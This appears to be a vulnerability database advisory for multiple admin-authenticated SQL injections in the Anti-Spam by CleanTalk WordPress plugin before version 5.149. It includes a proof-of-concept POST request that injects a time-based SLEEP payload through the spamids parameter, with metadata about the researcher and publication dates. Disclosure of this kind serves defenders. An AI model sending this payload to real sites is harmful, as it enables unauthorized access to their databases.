WordPress Plugin Vulnerabilities
Anti-Spam by CleanTalk < 5.149 - Multiple Authenticated SQL Injections
Description
Multiple authenticated SQL injections in the Anti-Spam by CleanTalk plugin 5.148 exist, however, it requires high privilege user (admin+).
Proof of Concept
Vulnerable functions: `removeLogs` and `removeSpam` at: lib/Cleantalk/ApbctWP/FindSpam/ListTable/Users.php Sleep query: ``` POST /wp-admin/users.php?page=ct_check_users&ct_worked=1 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 162 _wpnonce=2a613d258a&_wp_http_referer=%2Fwp-admin%2Fusers.php%3Fpage%3Dct_check_users%26ct_worked%3D1&action=-1&paged=1&spamids%5B%5D=30)+OR+SLEEP(1&action2=delete ```
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Nguyen Anh Tien
Submitter
Nguyen Anh Tien
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2020-11-20 (about 3 years ago)
Added
2020-11-20 (about 3 years ago)
Last Updated
2021-01-23 (about 3 years ago)